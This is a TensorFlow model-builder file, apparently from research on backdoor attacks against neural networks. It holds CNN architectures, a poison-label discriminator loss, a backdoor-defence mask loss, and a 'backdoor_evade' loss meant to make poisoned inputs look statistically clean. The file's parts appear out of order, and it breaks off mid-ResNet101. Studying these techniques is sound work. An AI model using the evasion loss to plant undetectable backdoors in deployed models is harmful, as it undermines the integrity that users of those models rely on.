variance_update = moving_averages.assign_moving_average(variance, batch_variance, decay=decay,
zero_debias=False)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, mean_update)
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, variance_update)
else:
bn, _, _ = tf.nn.fused_batch_norm(input, scale=scale, offset=offset, mean=mean, variance=variance,
name=name, is_training=False, epsilon=1e-5)
return bn
def convolution(self, input, name, group, strides, padding):
with tf.variable_scope(name):
w = self._variable_with_constant_value('weight', self.__weights_dict[name]['weights'])
strides = [1] + strides + [1]
layer = tf.nn.conv2d(input, w, strides=strides, padding=padding)
if 'bias' in self.__weights_dict[name]:
b = self._variable_with_constant_value('bias', self.__weights_dict[name]['bias'])
layer = tf.nn.bias_add(layer, b)
return layer
def _classification_loss(self, logits, aux_logits, labels):
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
if aux_logits is not None:
with tf.name_scope('aux_xentropy'):
aux_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=labels)
aux_loss = 0.4 * tf.reduce_mean(aux_cross_entropy, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _discriminator_loss(self, logits, aux_logits, labels, poison_lbs):
with tf.name_scope('discriminator_xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
loss = tf.reduce_mean(cross_entropy, name='discriminator_mean')
return loss
if ('defence' in self.options.net_mode):
with tf.name_scope('discriminator_xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
loss = tf.reduce_mean(cross_entropy, name='discriminator_mean')
else:
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
if aux_logits is not None:
with tf.name_scope('discriminator_xentropy'):
aux_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=aux_logits, labels=poison_lbs)
aux_loss = -1.0 * tf.reduce_mean(aux_cross_entropy, name='discriminator_mean')
loss = tf.add_n([loss, aux_loss])
return loss
def _triple_loss(self, logits, aux_logits, labels):
splited_labels = tf.unstack(labels, axis=1)
lambda_a = splited_labels[2]
lambda_b = 1 - lambda_a
with tf.name_scope('xentropy'):
a_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=tf.to_int32(splited_labels[0]), weights=lambda_a)
b_cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=tf.to_int32(splited_labels[1]), weights=lambda_b)
loss = tf.reduce_mean(a_cross_entropy + b_cross_entropy, name='xentropy_mean')
if aux_logits is not None:
ct_lambda = tf.concat([tf.expand_dims(lambda_a, 1), tf.expand_dims(lambda_b, 1)], axis=1)
splited_lambda = tf.split(ct_lambda, self.options.num_slices_one_batch, axis=0)
splited_aux_logits = tf.split(aux_logits, self.options.num_slices_one_batch, axis=0)
with tf.name_scope('aux_triplet'):
for _ct_lambda, _aux_logits in zip(splited_lambda, splited_aux_logits):
cross = tf.matmul(_aux_logits, tf.transpose(_aux_logits))
square_norm = tf.diag_part(cross)
square_cross = tf.square(cross)
square_cos = tf.divide(square_cross, tf.expand_dims(square_norm, 1))
square_cos = tf.divide(square_cos, tf.expand_dims(square_norm, 0))
unstacked_sq_cos = tf.unstack(square_cos, axis=0)
sq_cos_a = tf.expand_dims(unstacked_sq_cos[0], 1)
sq_cos_b = tf.expand_dims(unstacked_sq_cos[-1], 1)
ct_sq_cos = tf.concat(axis=1, values=[sq_cos_a, sq_cos_b])
ct_cos = tf.sqrt(ct_sq_cos)
triplet_loss = ct_sq_cos - 2.0 * ct_cos * _ct_lambda + tf.square(_ct_lambda)
aux_loss = tf.reduce_mean(triplet_loss, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _backdoor_defence_loss(self, logits, aux_logits, labels):
with tf.name_scope('xentropy'):
cross_entropy = tf.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')
with tf.name_scope('aux_l1norm'):
abs_logits = tf.abs(aux_logits)
abs_sum = tf.reduce_sum(abs_logits, [1, 2, 3])
# aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum)
aux_loss = self.options.loss_lambda * tf.reduce_mean(abs_sum, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def _backdoor_evade_loss(self, embeddings, mask, labels):
with tf.name_scope('xentropy'):
splited_embeddings = tf.split(embeddings, self.options.batch_size, axis=0)
xSxs = []
mu = tf.constant(self.mu)
inv_Sigma = tf.constant(self.inv_Sigma)
for em in splited_embeddings:
x = em-mu
xS = tf.matmul(x, inv_Sigma)
xSx = tf.matmul(xS, tf.transpose(x))
xSxs.append(xSx)
loss = tf.reduce_mean(xSxs, name='xentropy_mean')
with tf.name_scope('aux_l1norm'):
abs_logits = tf.abs(mask)
abs_sum = tf.reduce_sum(abs_logits, [1, 2, 3])
# aux_l1_norm = tf.losses.absolute_difference(labels=labels,predictions=abs_sum)
aux_loss = self.options.loss_lambda * tf.reduce_mean(abs_sum, name='aux_loss')
loss = tf.add_n([loss, aux_loss])
return loss
def loss_function(self, inputs, build_network_result):
logits = build_network_result.logits
aux_logits = build_network_result.extra_info
labels = inputs[1]
loss = None
"""Loss function."""
if self.options.net_mode == 'normal':
loss = self._classification_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'triple_loss':
loss = self._triple_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'backdoor_def':
loss = self._backdoor_defence_loss(logits, aux_logits, labels)
elif self.options.net_mode == 'backdoor_eva':
loss = self._backdoor_evade_loss(logits,aux_logits,labels)
elif 'discriminator' in self.options.net_mode:
loss = self._discriminator_loss(logits,aux_logits,labels, inputs[2])
return loss
def _collect_backbone_vars(self):
bottom_vars = {}
last_affine_vars = {}
mask_vars = {}
other_vars = {}
mome_vars = {}
adam_vars = {}
discriminator_vars = {}
all_vars = tf.global_variables()
for v in all_vars:
vname = v.name.split(':')[0]
if not str.startswith(vname,'v'):
other_vars[vname] = v
continue
sv = vname.split('/')
sv[0] = 'v0'
vname = '/'.join(sv)
if 'Adam' in vname:
adam_vars[vname] = v
elif 'Momentum' in vname:
mome_vars[vname]= v
elif self.last_affine_name is not None and self.last_affine_name in vname:
last_affine_vars[vname] = v
elif 'input_mask' in vname:
mask_vars[vname] = v
elif 'discriminator' in vname:
discriminator_vars[vname] = v
else:
bottom_vars[vname] = v
li = []
load_mode = self.options.load_mode
if load_mode == 'all' or 'mask' in load_mode:
li.append(mask_vars)
if load_mode == 'all' or 'bottom' in load_mode:
li.append(bottom_vars)
if load_mode == 'all' or 'discriminator' in load_mode:
li.append(discriminator_vars)
if load_mode == 'all' or 'affine' in load_mode:
li.append(last_affine_vars)
var_list = {}
for a in li:
var_list = {**var_list, **a}
return var_list
def add_backbone_saver(self):
# Create saver with mapping from variable names in checkpoint of backbone
# model to variables in SSD model
print('===Load===')
print('add abckbone saver: '+self.options.load_mode)
backbone_var_list = self._collect_backbone_vars()
self.backbone_savers.append(tf.train.Saver(backbone_var_list))
def load_backbone_model(self, sess, backbone_model_path):
print('===Load===')
for saver in self.backbone_savers:
print('load backbone model from: '+backbone_model_path)
saver.restore(sess, backbone_model_path)
def get_input_shapes(self, subset):
if ('discriminator' in self.options.net_mode):
return [[self.batch_size, self.image_size, self.image_size,self.depth],[self.batch_size],[self.batch_size]]
return [[self.batch_size, self.image_size, self.image_size,self.depth],[self.batch_size]]
| import tensorflow as tf
from models import model as model_lib
from tensorflow.python.training import moving_averages
import convnet_builder
from six.moves import xrange
import numpy as np
def load_weights(weight_file):
print('===Load===')
print('has loaded caffe_weight_file %s' % weight_file)
if weight_file is None:
return
try:
weights_dict = np.load(weight_file).item()
except:
weights_dict = np.load(weight_file, encoding='bytes').item()
return weights_dict
class Model_Builder(model_lib.CNNModel):
def __init__(self, model_name, num_class, options, params):
super(Model_Builder, self).__init__(model_name,
image_size=options.crop_size,
batch_size=options.batch_size,
learning_rate=options.base_lr,
params=params)
self.options = options
self.num_class = num_class
if model_name == 'resnet101':
self.__weights_dict = load_weights(options.caffe_model_path)
elif model_name == 'cifar10':
from models import resnet_model
self._resnet20 = resnet_model.create_resnet20_cifar_model(params)
elif model_name == 'cifar10_alexnet':
from models import alexnet_model
self._alexnet = alexnet_model.AlexnetCifar10Model()
elif model_name == 'resnet50':
from models import resnet_model
self._resnet50 = resnet_model.create_resnet50_model(params)
elif 'resnet101' in model_name:
from models import resnet_model
self._resnet101 = resnet_model.create_resnet101_model(params)
elif options.net_mode == 'backdoor_eva':
self.mu, self.inv_Sigma = self._read_gaussian_data(self.options.gaussian_data_file)
self.trainable = True
self.last_affine_name = None
self.backbone_savers=[]
def _read_gaussian_data(self, file_name):
from scipy.io import loadmat
in_list = loadmat(file_name)
return in_list['mu'].astype(np.float32), in_list['inv_Sigma'].astype(np.float32)
def _variable_with_constant_value(self, name, value, trainable=None):
if trainable is None:
trainable = self.trainable
var = tf.get_variable(name, value.shape, dtype=tf.float32, initializer=tf.constant_initializer(value),
trainable=trainable)
return var
def _gtsrb_inference(self, cnn):
num_conv_layers = [2, 2, 2]
assert len(num_conv_layers) == 3
for _ in xrange(num_conv_layers[0]):
cnn.conv(32, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[1]):
cnn.conv(64, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[2]):
cnn.conv(128, 3, 3)
cnn.mpool(2, 2)
cnn.dropout(keep_prob=0.8)
cnn.reshape([-1, 128 * 4 * 4])
cnn.affine(256)
cnn.dropout(keep_prob=0.5)
def _vgg16_inference(self, cnn):
num_conv_layers = [2, 2, 3, 3, 3]
"""Build vgg architecture from blocks."""
assert len(num_conv_layers) == 5
for _ in xrange(num_conv_layers[0]):
cnn.conv(64, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[1]):
cnn.conv(128, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[2]):
cnn.conv(256, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[3]):
cnn.conv(512, 3, 3)
cnn.mpool(2, 2)
for _ in xrange(num_conv_layers[4]):
cnn.conv(512, 3, 3)
cnn.mpool(2, 2)
cnn.reshape([-1, 512 * 4 * 4])
cnn.affine(4096)
cnn.dropout()
cnn.affine(256)
cnn.dropout()
def _googlenet_inference(self, cnn):
def inception_v1(cnn, k, l, m, n, p, q):
cols = [[('conv', k, 1, 1)], [('conv', l, 1, 1), ('conv', m, 3, 3)],
[('conv', n, 1, 1), ('conv', p, 5, 5)],
[('mpool', 3, 3, 1, 1, 'SAME'), ('conv', q, 1, 1)]]
cnn.inception_module('incept_v1', cols)
cnn.conv(64, 7, 7, 2, 2)
cnn.mpool(3, 3, 2, 2, mode='SAME')
cnn.conv(64, 1, 1)
cnn.conv(192, 3, 3)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 64, 96, 128, 16, 32, 32)
inception_v1(cnn, 128, 128, 192, 32, 96, 64)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 192, 96, 208, 16, 48, 64)
inception_v1(cnn, 160, 112, 224, 24, 64, 64)
inception_v1(cnn, 128, 128, 256, 24, 64, 64)
inception_v1(cnn, 112, 144, 288, 32, 64, 64)
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
cnn.mpool(3, 3, 2, 2, mode='SAME')
inception_v1(cnn, 256, 160, 320, 32, 128, 128)
inception_v1(cnn, 384, 192, 384, 48, 128, 128)
cnn.apool(4, 4, 1, 1, mode='VALID')
cnn.reshape([-1, 1024])
def _resnet101_inference(self, cnn):
conv1_pad = tf.pad(cnn.top_layer, paddings=[[0, 0], [3, 3], [3, 3], [0, 0]])
conv1 = self.convolution(conv1_pad, group=1, strides=[2, 2], padding='VALID', name='conv1')
bn_conv1 = self.batch_normalization(conv1, variance_epsilon=9.99999974738e-06, name='bn_conv1')
conv1_relu = tf.nn.relu(bn_conv1, name='conv1_relu')
pool1_pad = tf.pad(conv1_relu, paddings=[[0, 0], [0, 1], [0, 1], [0, 0]], constant_values=float('-Inf'))
pool1 = tf.nn.max_pool(pool1_pad, [1, 3, 3, 1], [1, 2, 2, 1], padding='VALID', name='pool1')
res2a_branch2a = self.convolution(pool1, group=1, strides=[1, 1], padding='VALID', name='res2a_branch2a')
res2a_branch1 = self.convolution(pool1, group=1, strides=[1, 1], padding='VALID', name='res2a_branch1')
bn2a_branch2a = self.batch_normalization(res2a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2a')
bn2a_branch1 = self.batch_normalization(res2a_branch1, variance_epsilon=9.99999974738e-06, name='bn2a_branch1')
res2a_branch2a_relu = tf.nn.relu(bn2a_branch2a, name='res2a_branch2a_relu')
res2a_branch2b_pad = tf.pad(res2a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2a_branch2b = self.convolution(res2a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2a_branch2b')
bn2a_branch2b = self.batch_normalization(res2a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2b')
res2a_branch2b_relu = tf.nn.relu(bn2a_branch2b, name='res2a_branch2b_relu')
res2a_branch2c = self.convolution(res2a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2a_branch2c')
bn2a_branch2c = self.batch_normalization(res2a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2a_branch2c')
res2a = bn2a_branch1 + bn2a_branch2c
res2a_relu = tf.nn.relu(res2a, name='res2a_relu')
res2b_branch2a = self.convolution(res2a_relu, group=1, strides=[1, 1], padding='VALID', name='res2b_branch2a')
bn2b_branch2a = self.batch_normalization(res2b_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2a')
res2b_branch2a_relu = tf.nn.relu(bn2b_branch2a, name='res2b_branch2a_relu')
res2b_branch2b_pad = tf.pad(res2b_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2b_branch2b = self.convolution(res2b_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2b_branch2b')
bn2b_branch2b = self.batch_normalization(res2b_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2b')
res2b_branch2b_relu = tf.nn.relu(bn2b_branch2b, name='res2b_branch2b_relu')
res2b_branch2c = self.convolution(res2b_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2b_branch2c')
bn2b_branch2c = self.batch_normalization(res2b_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2b_branch2c')
res2b = res2a_relu + bn2b_branch2c
res2b_relu = tf.nn.relu(res2b, name='res2b_relu')
res2c_branch2a = self.convolution(res2b_relu, group=1, strides=[1, 1], padding='VALID', name='res2c_branch2a')
bn2c_branch2a = self.batch_normalization(res2c_branch2a, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2a')
res2c_branch2a_relu = tf.nn.relu(bn2c_branch2a, name='res2c_branch2a_relu')
res2c_branch2b_pad = tf.pad(res2c_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res2c_branch2b = self.convolution(res2c_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res2c_branch2b')
bn2c_branch2b = self.batch_normalization(res2c_branch2b, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2b')
res2c_branch2b_relu = tf.nn.relu(bn2c_branch2b, name='res2c_branch2b_relu')
res2c_branch2c = self.convolution(res2c_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res2c_branch2c')
bn2c_branch2c = self.batch_normalization(res2c_branch2c, variance_epsilon=9.99999974738e-06,
name='bn2c_branch2c')
res2c = res2b_relu + bn2c_branch2c
res2c_relu = tf.nn.relu(res2c, name='res2c_relu')
res3a_branch1 = self.convolution(res2c_relu, group=1, strides=[2, 2], padding='VALID', name='res3a_branch1')
res3a_branch2a = self.convolution(res2c_relu, group=1, strides=[2, 2], padding='VALID', name='res3a_branch2a')
bn3a_branch1 = self.batch_normalization(res3a_branch1, variance_epsilon=9.99999974738e-06, name='bn3a_branch1')
bn3a_branch2a = self.batch_normalization(res3a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2a')
res3a_branch2a_relu = tf.nn.relu(bn3a_branch2a, name='res3a_branch2a_relu')
res3a_branch2b_pad = tf.pad(res3a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3a_branch2b = self.convolution(res3a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3a_branch2b')
bn3a_branch2b = self.batch_normalization(res3a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2b')
res3a_branch2b_relu = tf.nn.relu(bn3a_branch2b, name='res3a_branch2b_relu')
res3a_branch2c = self.convolution(res3a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3a_branch2c')
bn3a_branch2c = self.batch_normalization(res3a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3a_branch2c')
res3a = bn3a_branch1 + bn3a_branch2c
res3a_relu = tf.nn.relu(res3a, name='res3a_relu')
res3b1_branch2a = self.convolution(res3a_relu, group=1, strides=[1, 1], padding='VALID', name='res3b1_branch2a')
bn3b1_branch2a = self.batch_normalization(res3b1_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2a')
res3b1_branch2a_relu = tf.nn.relu(bn3b1_branch2a, name='res3b1_branch2a_relu')
res3b1_branch2b_pad = tf.pad(res3b1_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b1_branch2b = self.convolution(res3b1_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b1_branch2b')
bn3b1_branch2b = self.batch_normalization(res3b1_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2b')
res3b1_branch2b_relu = tf.nn.relu(bn3b1_branch2b, name='res3b1_branch2b_relu')
res3b1_branch2c = self.convolution(res3b1_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b1_branch2c')
bn3b1_branch2c = self.batch_normalization(res3b1_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b1_branch2c')
res3b1 = res3a_relu + bn3b1_branch2c
res3b1_relu = tf.nn.relu(res3b1, name='res3b1_relu')
res3b2_branch2a = self.convolution(res3b1_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2a')
bn3b2_branch2a = self.batch_normalization(res3b2_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2a')
res3b2_branch2a_relu = tf.nn.relu(bn3b2_branch2a, name='res3b2_branch2a_relu')
res3b2_branch2b_pad = tf.pad(res3b2_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b2_branch2b = self.convolution(res3b2_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2b')
bn3b2_branch2b = self.batch_normalization(res3b2_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2b')
res3b2_branch2b_relu = tf.nn.relu(bn3b2_branch2b, name='res3b2_branch2b_relu')
res3b2_branch2c = self.convolution(res3b2_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b2_branch2c')
bn3b2_branch2c = self.batch_normalization(res3b2_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b2_branch2c')
res3b2 = res3b1_relu + bn3b2_branch2c
res3b2_relu = tf.nn.relu(res3b2, name='res3b2_relu')
res3b3_branch2a = self.convolution(res3b2_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2a')
bn3b3_branch2a = self.batch_normalization(res3b3_branch2a, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2a')
res3b3_branch2a_relu = tf.nn.relu(bn3b3_branch2a, name='res3b3_branch2a_relu')
res3b3_branch2b_pad = tf.pad(res3b3_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res3b3_branch2b = self.convolution(res3b3_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2b')
bn3b3_branch2b = self.batch_normalization(res3b3_branch2b, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2b')
res3b3_branch2b_relu = tf.nn.relu(bn3b3_branch2b, name='res3b3_branch2b_relu')
res3b3_branch2c = self.convolution(res3b3_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res3b3_branch2c')
bn3b3_branch2c = self.batch_normalization(res3b3_branch2c, variance_epsilon=9.99999974738e-06,
name='bn3b3_branch2c')
res3b3 = res3b2_relu + bn3b3_branch2c
res3b3_relu = tf.nn.relu(res3b3, name='res3b3_relu')
res4a_branch1 = self.convolution(res3b3_relu, group=1, strides=[2, 2], padding='VALID', name='res4a_branch1')
res4a_branch2a = self.convolution(res3b3_relu, group=1, strides=[2, 2], padding='VALID', name='res4a_branch2a')
bn4a_branch1 = self.batch_normalization(res4a_branch1, variance_epsilon=9.99999974738e-06, name='bn4a_branch1')
bn4a_branch2a = self.batch_normalization(res4a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2a')
res4a_branch2a_relu = tf.nn.relu(bn4a_branch2a, name='res4a_branch2a_relu')
res4a_branch2b_pad = tf.pad(res4a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4a_branch2b = self.convolution(res4a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4a_branch2b')
bn4a_branch2b = self.batch_normalization(res4a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2b')
res4a_branch2b_relu = tf.nn.relu(bn4a_branch2b, name='res4a_branch2b_relu')
res4a_branch2c = self.convolution(res4a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4a_branch2c')
bn4a_branch2c = self.batch_normalization(res4a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4a_branch2c')
res4a = bn4a_branch1 + bn4a_branch2c
res4a_relu = tf.nn.relu(res4a, name='res4a_relu')
res4b1_branch2a = self.convolution(res4a_relu, group=1, strides=[1, 1], padding='VALID', name='res4b1_branch2a')
bn4b1_branch2a = self.batch_normalization(res4b1_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2a')
res4b1_branch2a_relu = tf.nn.relu(bn4b1_branch2a, name='res4b1_branch2a_relu')
res4b1_branch2b_pad = tf.pad(res4b1_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b1_branch2b = self.convolution(res4b1_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b1_branch2b')
bn4b1_branch2b = self.batch_normalization(res4b1_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2b')
res4b1_branch2b_relu = tf.nn.relu(bn4b1_branch2b, name='res4b1_branch2b_relu')
res4b1_branch2c = self.convolution(res4b1_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b1_branch2c')
bn4b1_branch2c = self.batch_normalization(res4b1_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b1_branch2c')
res4b1 = res4a_relu + bn4b1_branch2c
res4b1_relu = tf.nn.relu(res4b1, name='res4b1_relu')
res4b2_branch2a = self.convolution(res4b1_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2a')
bn4b2_branch2a = self.batch_normalization(res4b2_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2a')
res4b2_branch2a_relu = tf.nn.relu(bn4b2_branch2a, name='res4b2_branch2a_relu')
res4b2_branch2b_pad = tf.pad(res4b2_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b2_branch2b = self.convolution(res4b2_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2b')
bn4b2_branch2b = self.batch_normalization(res4b2_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2b')
res4b2_branch2b_relu = tf.nn.relu(bn4b2_branch2b, name='res4b2_branch2b_relu')
res4b2_branch2c = self.convolution(res4b2_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b2_branch2c')
bn4b2_branch2c = self.batch_normalization(res4b2_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b2_branch2c')
res4b2 = res4b1_relu + bn4b2_branch2c
res4b2_relu = tf.nn.relu(res4b2, name='res4b2_relu')
res4b3_branch2a = self.convolution(res4b2_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2a')
bn4b3_branch2a = self.batch_normalization(res4b3_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2a')
res4b3_branch2a_relu = tf.nn.relu(bn4b3_branch2a, name='res4b3_branch2a_relu')
res4b3_branch2b_pad = tf.pad(res4b3_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b3_branch2b = self.convolution(res4b3_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2b')
bn4b3_branch2b = self.batch_normalization(res4b3_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2b')
res4b3_branch2b_relu = tf.nn.relu(bn4b3_branch2b, name='res4b3_branch2b_relu')
res4b3_branch2c = self.convolution(res4b3_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b3_branch2c')
bn4b3_branch2c = self.batch_normalization(res4b3_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b3_branch2c')
res4b3 = res4b2_relu + bn4b3_branch2c
res4b3_relu = tf.nn.relu(res4b3, name='res4b3_relu')
res4b4_branch2a = self.convolution(res4b3_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2a')
bn4b4_branch2a = self.batch_normalization(res4b4_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2a')
res4b4_branch2a_relu = tf.nn.relu(bn4b4_branch2a, name='res4b4_branch2a_relu')
res4b4_branch2b_pad = tf.pad(res4b4_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b4_branch2b = self.convolution(res4b4_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2b')
bn4b4_branch2b = self.batch_normalization(res4b4_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2b')
res4b4_branch2b_relu = tf.nn.relu(bn4b4_branch2b, name='res4b4_branch2b_relu')
res4b4_branch2c = self.convolution(res4b4_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b4_branch2c')
bn4b4_branch2c = self.batch_normalization(res4b4_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b4_branch2c')
res4b4 = res4b3_relu + bn4b4_branch2c
res4b4_relu = tf.nn.relu(res4b4, name='res4b4_relu')
res4b5_branch2a = self.convolution(res4b4_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2a')
bn4b5_branch2a = self.batch_normalization(res4b5_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2a')
res4b5_branch2a_relu = tf.nn.relu(bn4b5_branch2a, name='res4b5_branch2a_relu')
res4b5_branch2b_pad = tf.pad(res4b5_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b5_branch2b = self.convolution(res4b5_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2b')
bn4b5_branch2b = self.batch_normalization(res4b5_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2b')
res4b5_branch2b_relu = tf.nn.relu(bn4b5_branch2b, name='res4b5_branch2b_relu')
res4b5_branch2c = self.convolution(res4b5_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2c')
bn4b5_branch2c = self.batch_normalization(res4b5_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2c')
res4b5 = res4b4_relu + bn4b5_branch2c
res4b5_relu = tf.nn.relu(res4b5, name='res4b5_relu')
res4b6_branch2a = self.convolution(res4b5_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2a')
bn4b6_branch2a = self.batch_normalization(res4b6_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2a')
res4b6_branch2a_relu = tf.nn.relu(bn4b6_branch2a, name='res4b6_branch2a_relu')
res4b6_branch2b_pad = tf.pad(res4b6_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b6_branch2b = self.convolution(res4b6_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2b')
bn4b6_branch2b = self.batch_normalization(res4b6_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2b')
res4b6_branch2b_relu = tf.nn.relu(bn4b6_branch2b, name='res4b6_branch2b_relu')
res4b6_branch2c = self.convolution(res4b6_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2c')
bn4b6_branch2c = self.batch_normalization(res4b6_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2c')
res4b6 = res4b5_relu + bn4b6_branch2c
res4b6_relu = tf.nn.relu(res4b6, name='res4b6_relu')
res4b7_branch2a = self.convolution(res4b6_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2a')
bn4b7_branch2a = self.batch_normalization(res4b7_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2a')
res4b7_branch2a_relu = tf.nn.relu(bn4b7_branch2a, name='res4b7_branch2a_relu')
